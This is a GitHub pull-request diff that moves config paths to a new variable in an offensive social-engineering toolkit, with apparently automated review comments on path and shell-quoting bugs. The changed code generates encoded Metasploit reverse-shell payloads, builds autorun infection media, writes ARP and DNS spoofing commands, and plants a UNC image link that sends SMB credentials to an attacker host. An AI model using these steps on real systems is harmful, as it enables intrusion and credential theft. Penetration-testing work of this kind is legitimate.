Merge pull request #507 from IonoclastBrigham/path-fixes

Path fixes
This commit is contained in:
trustedsec 2018-02-22 13:34:30 -05:00 committed by GitHub
commit 0ca44a6437
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
42 changed files with 750 additions and 723 deletions


@ -35,7 +35,7 @@ except NameError:
pass pass
definepath = os.getcwd() definepath = os.getcwd()
setdir = core.setdir() userconfigpath = core.userconfigpath
MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first" MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
@ -100,10 +100,10 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
############################################ ############################################
# this part is needed to rename the msf.exe file to a randomly generated one # this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile(os.path.join(setdir, "/rand_gen")): if os.path.isfile(os.path.join(userconfigpath, "rand_gen")):
# open the file # open the file
# start a loop # start a loop
with open(os.path.join(setdir, "rand_gen")) as fileopen: with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:
for line in fileopen: for line in fileopen:
# define executable name and rename it # define executable name and rename it
filename = line.rstrip() filename = line.rstrip()
@ -111,7 +111,7 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait() subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait()
# lastly we need to copy over the signed applet # lastly we need to copy over the signed applet
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir, directory), shell=True).wait() subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()
# TODO index.html parsen und IPADDR:Port ersetzen # TODO index.html parsen und IPADDR:Port ersetzen
with open(os.path.join(directory, "index.html"), "rb") as fileopen: with open(os.path.join(directory, "index.html"), "rb") as fileopen:
@ -148,7 +148,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
############ ############
# PATCH Server IP into RATTE # PATCH Server IP into RATTE
############ ############
with open(os.path.join(setdir, "ratteM.exe"), 'wb') as filewrite: with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
host = (len(ipaddr) + 1) * "X" host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y" r_port = (len(str(ratteport)) + 1) * "Y"
@ -271,10 +271,10 @@ def main():
core.print_info("Starting java applet attack...") core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr) java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(setdir, definepath, "/rand_gen")) as fileopen: with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen: for line in fileopen:
ratte_random = line.rstrip() ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(setdir, definepath), definepath, ratte_random), shell=True).wait() subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
####################### #######################
# start ratteserver # start ratteserver
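Review bot: `os.path.join(userconfigpath, definepath, "/rand_gen")` at L44 still resolves to `/rand_gen`: `definepath` is `os.getcwd()` (L15) and `"/rand_gen"` is absolute, and os.path.join discards every component before an absolute one, so this open looks at the filesystem root rather than at the file that L24 reads from `os.path.join(userconfigpath, "rand_gen")` — the very form this commit introduced a few lines earlier. For the same reason `os.path.join(userconfigpath, definepath)` at L47 collapses to `definepath`, although prepare_ratte writes ratteM.exe under userconfigpath (L38), so the copy source should be that directory. Proposed: `with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:` and `subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (userconfigpath, definepath, ratte_random), shell=True).wait()`. main() continues outside the hunk.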


@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
############ ############
# PATCH Server IP into RATTE # PATCH Server IP into RATTE
############ ############
with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite: with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X" host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y" r_port = (len(str(ratteport)) + 1) * "Y"
@ -126,7 +126,7 @@ def main():
############ ############
prepare_ratte(ipaddr, ratteport, persistent, customexe) prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe")) core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))
################### ###################
# start ratteserver # start ratteserver


@ -45,7 +45,7 @@ if operating_system == "posix":
else: else:
proxy_string = "export http_proxy='http://{0}'".format(proxy) proxy_string = "export http_proxy='http://{0}'".format(proxy)
with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "proxy.config"), "w") as filewrite:
filewrite.write(proxy_string) filewrite.write(proxy_string)
def kill_proc(port, flag): def kill_proc(port, flag):


@ -51,8 +51,9 @@ import src.core.setcore as core
from src.core.menu import text from src.core.menu import text
from src.core.update_config import update_config from src.core.update_config import update_config
if os.path.isfile(os.path.join(core.setdir, "version.lock")):
os.remove(os.path.join(core.setdir, "version.lock")) if os.path.isfile(os.path.join(core.userconfigpath, "version.lock")):
os.remove(os.path.join(core.userconfigpath, "version.lock"))
# check directory and make it # check directory and make it
if not os.path.isdir("src/logs/"): if not os.path.isdir("src/logs/"):
@ -69,16 +70,16 @@ operating_system = core.check_os()
# use ~/.set # use ~/.set
if operating_system == "posix": if operating_system == "posix":
if not os.path.isdir(core.setdir): if not os.path.isdir(core.userconfigpath):
# create the set variables # create the set variables
os.makedirs(core.setdir) os.makedirs(core.userconfigpath)
# if for some reason it failed to pull the path # if for some reason it failed to pull the path
userdir = os.path.join(os.path.expanduser('~'), '.set') userdir = os.path.join(os.path.expanduser('~'), '.set')
if not os.path.isdir(userdir): if not os.path.isdir(userdir):
os.makedirs(userdir) os.makedirs(userdir)
if not os.path.isdir(os.path.join(core.setdir, "reports")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
os.makedirs(os.path.join(core.setdir, "reports")) os.makedirs(os.path.join(core.userconfigpath, "reports"))
# check to see if we have python-pycrypto # check to see if we have python-pycrypto
try: try:
@ -115,7 +116,7 @@ if dns.lower() == "on":
core.start_dns() core.start_dns()
# remove old files # remove old files
for root, dirs, files in os.walk(core.setdir): for root, dirs, files in os.walk(core.userconfigpath):
for f in files: for f in files:
try: try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f) match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
@ -154,13 +155,13 @@ define_version = core.get_version()
core.cleanup_routine() core.cleanup_routine()
# create the set.options routine # create the set.options routine
with open(os.path.join(core.setdir, "/set.options"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "set.options"), "w") as filewrite:
filewrite.write("{This is the main SET configuration file for all options used in SET}\n") filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
try: try:
# Remove old Signed_Updates # Remove old Signed_Updates
if os.path.isfile(os.path.join(core.setdir, "/Signed_Update.jar")): if os.path.isfile(os.path.join(core.userconfigpath, "Signed_Update.jar")):
os.remove(os.path.join(core.setdir, "/Signed_Update.jar")) os.remove(os.path.join(core.userconfigpath, "Signed_Update.jar"))
# initial user menu # initial user menu
if not os.path.isfile("src/agreement4"): if not os.path.isfile("src/agreement4"):
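Review bot: The fallback at L93-L95 creates `~/.set` independently of `core.userconfigpath`: when userconfigpath resolves to that same directory the block merely repeats L89-L91, and when it resolves elsewhere the script creates a second directory that nothing in this file uses, so the comment "if for some reason it failed to pull the path" no longer describes what the code does. Either L93-L95 should go, or the fallback should assign the path the rest of the file reads; which is right depends on how setcore computes userconfigpath, which is not visible here. The reports directory handling at L96-L97 already follows userconfigpath, so the fallback is the only place where the two can diverge. This is top-level script code that continues outside the hunk.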

182
setup.py

@ -3,89 +3,115 @@
# #
# Python installer # Python installer
# #
import subprocess
import sys
import os import os
import platform import platform
import shutil
import subprocess
import sys
# if nix then run installer
if platform.system() == "Linux":
# give installer a null value
installer = False
# Check user ID ## pre-install sanity checks ##
if os.getuid() != 0:
print("Are you root? Please execute as root") # if our command option is true then install stuff
exit() if len(sys.argv) != 2 or sys.argv[1] != "install":
print("** SET Installer **")
print("** Written by: Dave Kennedy (ReL1K) **")
print("** Visit: https://www.trustedsec.com **")
print("\nTo install, run: `# setup.py install'")
exit()
platformOS = platform.system()
if platformOS not in ["Linux", "Darwin"]:
print("[!] Sorry this installer is not designed for %s (only Linux and Mac)"
". Please install the Python dependencies manually." % platformOS)
exit()
# Check user ID
if os.getuid() != 0:
print("** SET Installer **")
print("[!] Please execute as root: `$ sudo python setup.py install'")
exit()
## SET installation ##
# do install of SET itself
def install(prefix):
destdir = "%s/share/setoolkit" % prefix
bindir = "%s/bin" % prefix
print("[*] Copying setoolkit into the %s directory..." % destdir)
subprocess.Popen("cp -rf . %s" % destdir, shell=True).wait()
print("[*] Installing setoolkit runner to %s..." % bindir)
subprocess.Popen("echo \#!/bin/bash > %s/setoolkit" % bindir, shell=True).wait()
subprocess.Popen("echo cd {0} >> {1}/setoolkit".format(destdir, bindir), shell=True).wait()
subprocess.Popen("echo exec python setoolkit $@ >> %s/setoolkit" % bindir, shell=True).wait()
subprocess.Popen("chmod +x %s/setoolkit" % bindir, shell=True).wait()
print("[*] Installing setoolkit updater to %s..." % bindir)
subprocess.Popen("cp {0}/seupdate {1}/".format(destdir, bindir), shell=True).wait()
subprocess.Popen("chmod +x %s/seupdate" % bindir, shell=True).wait()
if not os.path.isdir("/etc/setoolkit/"):
print("[*] Creating setoolkit config dir /etc/setoolkit./..")
os.makedirs("/etc/setoolkit/")
if not os.path.isfile("/etc/setoolkit/set.config"):
print("[*] Installing default setoolkit config to /etc/setoolkit./..")
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
print("[*] We are now finished! To run SET, type `setoolkit'...")
# if linux then run installer
if platformOS == "Linux":
print("[*] Installing dependencies...")
# if we trigger on sources.list then we know its ubuntu
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen("apt-get -y install "
"git apache2 python-requests libapache2-mod-php "
"python-pymssql build-essential python-pexpect "
"python-pefile python-crypto python-openssl", shell=True).wait()
# If pacman.conf exists, we have a Arch based system
elif os.path.isfile("/etc/pacman.conf"):
subprocess.Popen("pacman -S --noconfirm --needed git python2 "
"python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen("wget https://github.com/erocarrera/pefile/archive/master.zip", shell=True).wait()
subprocess.Popen("unzip master.zip", shell=True).wait()
subprocess.Popen("chmod a+x pefile-master/setup.py", shell=True).wait()
subprocess.Popen("rm -rf pefile-master*", shell=True).wait()
# if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
elif os.path.isfile("/etc/dnf/dnf.conf"):
subprocess.Popen("dnf -y install git python-pexpect python-pefile python-crypto pyOpenSSL", shell=True).wait()
# if sources.list or pacman.conf is not available then we're running
# something offset
else:
print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
sys.exit()
if os.path.isdir("/usr/share/setoolkit"):
print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
sys.exit()
if not os.path.isfile("/usr/bin/git"):
print("[-] Install failed. GIT is not installed. SET will not continue.")
print("[!] Install GIT and run the installer again.")
sys.exit()
try: try:
# if our command option is true then install stuff install(prefix="/usr")
if sys.argv[1] == "install": except Exception as e:
installer = True print("[!] Error installing setoolkit", e)
# if index is out of range then flag options if platformOS == 'Darwin':
except IndexError: print("[*] Installing dependencies...")
print("** SET Dependency Installer **")
print("** Written by: Dave Kennedy (ReL1K) **")
print("** Visit: https://www.trustedsec.com **")
print("\nTo install: setup.py install")
# if user specified install then lets to the installation
if installer is True:
# if we trigger on sources.list then we know its ubuntu
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen("apt-get -y install "
"git apache2 python-requests libapache2-mod-php "
"python-pymssql build-essential python-pexpect "
"python-pefile python-crypto python-openssl", shell=True).wait()
# If pacman.conf exists, we have a Arch based system
elif os.path.isfile("/etc/pacman.conf"):
subprocess.Popen("pacman -S --noconfirm --needed git python2 "
"python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen("wget https://github.com/erocarrera/pefile/archive/master.zip", shell=True).wait()
subprocess.Popen("unzip master.zip", shell=True).wait()
subprocess.Popen("chmod a+x pefile-master/setup.py", shell=True).wait()
subprocess.Popen("rm -rf pefile-master*", shell=True).wait()
# if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
elif os.path.isfile("/etc/dnf/dnf.conf"):
subprocess.Popen("dnf -y install git python-pexpect python-pefile python-crypto pyOpenSSL", shell=True).wait()
# if sources.list or pacman.conf is not available then we're running
# something offset
else:
print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
sys.exit()
if os.path.isdir("/usr/share/setoolkit"):
print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
sys.exit()
if not os.path.isfile("/usr/bin/git"):
print("[-] Install failed. GIT is not installed. SET will not continue.")
print("[!] Install GIT and run the installer again.")
sys.exit()
print("[*] Copying SET into the /usr/share/setoolkit directory...")
cwdpath = os.getcwd()
subprocess.Popen("cd ..;cp -rf %s /usr/share/setoolkit" % cwdpath, shell=True).wait()
print("[*] Installing setoolkit installer to /usr/bin/setoolkit...")
subprocess.Popen("echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("chmod +x /usr/bin/setoolkit", shell=True).wait()
print("[*] We are now finished! To run SET, type setoolkit...")
if platform.system() == 'Darwin':
subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait() subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
try:
if platform.system() not in ["Linux", "Darwin"]: install(prefix="/usr/local")
print("[!] Sorry this installer is not designed for any other system other " except Exception as e:
"than Linux and Mac. Please install the Python dependencies manually.") print("[!] Error installing setoolkit", e)


@ -12,7 +12,7 @@ import src.core.setcore as core
definepath = os.getcwd() definepath = os.getcwd()
msf_path = core.meta_path() msf_path = core.meta_path()
me = core.mod_name() me = core.mod_name()
autorun_path = os.path.join(core.setdir, "autorun") autorun_path = os.path.join(core.userconfigpath, "autorun")
trigger = 0 trigger = 0
@ -21,23 +21,23 @@ if core.check_options("INFECTION_MEDIA=") == "ON":
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path, "cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "payload.exe"), os.path.join(core.userconfigpath, "payload.exe"),
os.path.join(autorun_path, "program.exe")), os.path.join(autorun_path, "program.exe")),
shell=True).wait() shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "fileformat.file")): if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
trigger = 2 trigger = 2
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path, "cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
os.path.join(core.setdir, "template.pdf")), os.path.join(core.userconfigpath, "template.pdf")),
shell=True).wait() shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "/dll/openthis.wab")): if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")):
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path, "cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "/dll/*")), os.path.join(core.userconfigpath, "dll/*")),
shell=True).wait() shell=True).wait()
trigger = 3 trigger = 3
@ -71,9 +71,9 @@ if trigger in [1, 2, 3]:
if choice1.lower() == "yes" or choice1.lower() == "y": if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the # if we used something to create other than solo.py then write out the
# listener # listener
if not os.path.isfile(os.path.join(core.setdir, "meta_config")): if not os.path.isfile(os.path.join(core.userconfigpath, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \ with open(os.path.join(core.userconfigpath, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen: open(os.path.join(core.userconfigpath, "payload.options")) as fileopen:
for line in fileopen: for line in fileopen:
line = line.split(" ") line = line.split(" ")
filewrite.write("use multi/handler\n") filewrite.write("use multi/handler\n")
@ -86,7 +86,7 @@ if trigger in [1, 2, 3]:
# create the listener # create the listener
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..") core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")), os.path.join(core.userconfigpath, "meta_config")),
shell=True).wait() shell=True).wait()
else: else:
core.print_warning("cancelling...") core.print_warning("cancelling...")
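Review bot: The paths derived from core.userconfigpath are interpolated unquoted into the `rm -rf {0} ...; mkdir {0} ...; cp {1} {2}` shell strings at L282-L287, L290-L294 and L296-L300, so a config path containing whitespace or shell metacharacters would split the command and `rm -rf` would act on something other than autorun_path; the `2> /dev/null` redirects also hide any failure, leaving trigger set although nothing was copied. The same work can be done without a shell, as shown below for the fileformat branch (`shutil` would have to be imported at the top of the file if it is not already, and the `dll/*` branch at L295-L300 would iterate `glob.glob` for the wildcard). The top-level script continues outside this hunk.
```python
if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
    trigger = 2
    # recreate the autorun staging directory without going through a shell
    if os.path.isdir(autorun_path):
        shutil.rmtree(autorun_path)
    os.makedirs(autorun_path)
    shutil.copy(os.path.join(core.userconfigpath, "template.pdf"), autorun_path)
```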


@ -105,7 +105,7 @@ if ettercapchoice == 'y':
# spawn a child process # spawn a child process
os.chdir(cwd) os.chdir(cwd)
time.sleep(5) time.sleep(5)
filewrite = open(setdir + "/ettercap", "w") filewrite = open(userconfigpath + "ettercap", "w")
filewrite.write( filewrite.write(
"ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge)) "ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge))
filewrite.close() filewrite.close()
@ -147,8 +147,8 @@ if dsniffchoice == 'y':
if dns_spoof == "": if dns_spoof == "":
dns_spoof = "*" dns_spoof = "*"
subprocess.Popen( subprocess.Popen(
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (setdir), shell=True).wait() "rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait()
filewrite = open(setdir + "/dnsspoof.conf", "w") filewrite = open(userconfigpath + "dnsspoof.conf", "w")
filewrite.write("%s %s" % (ipaddr, dns_spoof)) filewrite.write("%s %s" % (ipaddr, dns_spoof))
filewrite.close() filewrite.close()
print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!") print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!")
@ -160,10 +160,10 @@ if dsniffchoice == 'y':
gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % ( gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % (
interface), shell=True, stdout=subprocess.PIPE).communicate()[0] interface), shell=True, stdout=subprocess.PIPE).communicate()[0]
# open file for writing # open file for writing
filewrite = open(setdir + "/ettercap", "w") filewrite = open(userconfigpath + "ettercap", "w")
# write the arpspoof / dnsspoof commands to file # write the arpspoof / dnsspoof commands to file
filewrite.write( filewrite.write(
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, setdir)) "arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath))
# close the file # close the file
filewrite.close() filewrite.close()
# change back to normal directory # change back to normal directory
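Review bot: `open(userconfigpath + "ettercap", "w")` at L327 (and L336, L344) now relies on core.userconfigpath ending in a path separator, while `"rm %s/dnsspoof.conf" % (userconfigpath)` at L335 and `"dnsspoof -f %s/dnsspoof.conf"` at L347 insert their own `/`; whichever way userconfigpath is terminated, one of the two forms either glues the file name onto the directory name or produces a doubled slash. `os.path.join` is correct in both cases, e.g. `filewrite = open(os.path.join(userconfigpath, "ettercap"), "w")` and `"rm %s 1> /dev/null 2> /dev/null" % os.path.join(userconfigpath, "dnsspoof.conf")`. The same trailing-separator assumption recurs in the later file sections (L358-L369, L379-L381, L487-L513).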


@ -263,7 +263,7 @@ try:
# specify we are using the fasttrack # specify we are using the fasttrack
# option, this disables some features # option, this disables some features
filewrite = open( filewrite = open(
setdir + "/fasttrack.options", "w") userconfigpath + "fasttrack.options", "w")
filewrite.write("none") filewrite.write("none")
filewrite.close() filewrite.close()
# import fasttrack # import fasttrack
@ -439,10 +439,10 @@ try:
# if we are using the built in one # if we are using the built in one
if dict == "": if dict == "":
# write out a file # write out a file
filewrite = open(setdir + "/dictionary.txt", "w") filewrite = open(userconfigpath + "dictionary.txt", "w")
filewrite.write("\nPassword1\nPassword!\nlc username") filewrite.write("\nPassword1\nPassword!\nlc username")
# specify the path # specify the path
dict = setdir + "/dictionary.txt" dict = userconfigpath + "dictionary.txt"
filewrite.close() filewrite.close()
# if we are not brute forcing # if we are not brute forcing
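Review bot: The new `userconfigpath + "dictionary.txt"` is spelled twice at L366 and L369, and the file opened at L366 is only closed at L370 after the second spelling has been assigned; computing the path once and writing under `with` removes the duplication and the dangling handle: `dict_path = os.path.join(userconfigpath, "dictionary.txt")`, `with open(dict_path, "w") as filewrite: filewrite.write("\nPassword1\nPassword!\nlc username")`, then `dict = dict_path`. The target variable `dict` also shadows the builtin, but it is used on the context line L364 and presumably beyond this hunk, so renaming it is a wider change. The enclosing try block continues outside the hunk.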


@ -196,20 +196,20 @@ if exploit_counter == 0:
print_info("Generating fileformat exploit...") print_info("Generating fileformat exploit...")
# START THE EXE TO VBA PAYLOAD # START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload': if exploit != 'custom/exe/to/vba/payload':
output = setdir + "/%s" % (outfile) output = userconfigpath + "%s" % (outfile)
if os.path.isfile(setdir + "/template.pdf"): if os.path.isfile(userconfigpath + "template.pdf"):
os.remove(setdir + "/template.pdf") os.remove(userconfigpath + "template.pdf")
if os.path.isfile(msfpath + "local/template.pdf"): if os.path.isfile(msfpath + "local/template.pdf"):
os.remove(msfpath + "local/template.pdf") os.remove(msfpath + "local/template.pdf")
if inputpdf != "": inputpdf = ("set INFILENAME " + inputpdf + "\n") if inputpdf != "": inputpdf = ("set INFILENAME " + inputpdf + "\n")
output = output.replace("//", "/") output = output.replace("//", "/")
filewrite = open(setdir + "/template.rc", "w") filewrite = open(userconfigpath + "template.rc", "w")
filewrite.write("use %s\nset LHOST %s\nset LPORT %s\n%sset FILENAME %s\nexploit\n" % filewrite.write("use %s\nset LHOST %s\nset LPORT %s\n%sset FILENAME %s\nexploit\n" %
(exploit, rhost, lport, inputpdf, output)) (exploit, rhost, lport, inputpdf, output))
filewrite.close() filewrite.close()
child = pexpect.spawn( child = pexpect.spawn(
"%smsfconsole -r %s/template.rc" % (meta_path, setdir)) "%smsfconsole -r %s/template.rc" % (meta_path, userconfigpath))
a = 1 a = 1
counter = 0 counter = 0
while a == 1: while a == 1:
@ -219,15 +219,15 @@ if exploit_counter == 0:
print_error("You will need to troubleshoot Metasploit manually and try generating a PDF. You can manually troubleshoot by going to /root/.set/ and typing msfconsole -r template.rc to reproduce the issue.") print_error("You will need to troubleshoot Metasploit manually and try generating a PDF. You can manually troubleshoot by going to /root/.set/ and typing msfconsole -r template.rc to reproduce the issue.")
pause = raw_input("Press {return} to move back.") pause = raw_input("Press {return} to move back.")
break break
if os.path.isfile(setdir + "/" + outfile): if os.path.isfile(userconfigpath + "" + outfile):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, userconfigpath),
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 # break a = 2 # break
else: else:
print_status("Waiting for payload generation to complete (be patient, takes a bit)...") print_status("Waiting for payload generation to complete (be patient, takes a bit)...")
if os.path.isfile(msfpath + "local/" + outfile): if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" % subprocess.Popen("cp %slocal/%s %s" %
(msfpath, outfile, setdir), shell=True) (msfpath, outfile, userconfigpath), shell=True)
counter = counter + 1 counter = counter + 1
time.sleep(3) time.sleep(3)
@ -244,23 +244,23 @@ if exploit_counter == 0:
execute1 = ("exe") execute1 = ("exe")
payloadname = ("vb.exe") payloadname = ("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True) (meta_path, payload, rhost, lport, execute1, userconfigpath, payloadname), shell=True)
if noencode == 0: if noencode == 0:
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
(meta_path, setdir, setdir), shell=True) (meta_path, userconfigpath, userconfigpath), shell=True)
# Create the VB script here # Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
(meta_path, setdir, setdir), shell=True) (meta_path, userconfigpath, userconfigpath), shell=True)
print_info("Raring the VBS file.") print_info("Raring the VBS file.")
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
(setdir, setdir), shell=True) (userconfigpath, userconfigpath), shell=True)
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER # NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite = open(setdir + "/payload.options", "w") filewrite = open(userconfigpath + "payload.options", "w")
filewrite.write(payload + " " + rhost + " " + lport) filewrite.write(payload + " " + rhost + " " + lport)
filewrite.close() filewrite.close()
if exploit != "dll_hijacking": if exploit != "dll_hijacking":
if not os.path.isfile(setdir + "/fileformat.file"): if not os.path.isfile(userconfigpath + "fileformat.file"):
sys.path.append("src/phishing/smtp/client/") sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1) debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: try:
@ -279,11 +279,11 @@ if exploit == "unc_embed":
letters = string.ascii_letters + string.digits letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)]) return ''.join([random.choice(letters) for _ in range(length)])
rand_gen = random_string() rand_gen = random_string()
filewrite = open(setdir + "/unc_config", "w") filewrite = open(userconfigpath + "unc_config", "w")
filewrite.write("use server/capture/smb\n") filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
filewrite.close() filewrite.close()
filewrite = open(setdir + "/template.doc", "w") filewrite = open(userconfigpath + "template.doc", "w")
filewrite.write( filewrite.write(
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen)) r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
filewrite.close() filewrite.close()
@ -312,16 +312,16 @@ if exploit == "dll_hijacking":
# if we are not using apache # if we are not using apache
if apache == 0: if apache == 0:
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hijacking") filewrite.write("hijacking")
filewrite.close() filewrite.close()
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
